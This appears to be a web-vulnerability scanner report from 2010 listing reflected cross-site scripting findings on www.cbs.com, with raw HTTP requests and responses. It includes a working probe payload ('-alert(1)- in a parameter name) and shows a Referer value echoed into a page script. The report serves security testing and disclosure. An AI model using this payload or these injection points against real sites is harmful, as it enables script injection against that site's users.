1. Cross-site scripting (reflected)
1.1. http://www.cbs.com/ [name of an arbitrarily supplied request parameter]
1.2. http://www.cbs.com/ [Referer HTTP header]
Severity: | High |
Confidence: | Certain |
Host: | http://www.cbs.com |
Path: | / |
GET /?c343c'-alert(1)- Host: www.cbs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP/5.2.14 X-Real-Server: ws3229.drt.cbsig.net Content-Type: text/html; charset=ISO-8859-1 Expires: Sat, 13 Nov 2010 23:43:36 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 13 Nov 2010 23:43:36 GMT Connection: close Connection: Transfer-Encoding Content-Length: 77668 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta name="keywords" cont ...[SNIP]... <a href="/community/login ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://www.cbs.com |
Path: | / |
GET / HTTP/1.1 Host: www.cbs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com |
HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP/5.2.14 X-Real-Server: ws3168.drt.cbsig.net Content-Type: text/html; charset=ISO-8859-1 Expires: Sat, 13 Nov 2010 23:43:38 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 13 Nov 2010 23:43:38 GMT Connection: close Connection: Transfer-Encoding Content-Length: 77709 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta name="keywords" cont ...[SNIP]... <script type="text/javascript"> var DW_referer = "http://www.google.com var DW_srcURL = "/index.php"; var DW_ctype = ""; var DW_cval = ""; </script> ...[SNIP]... |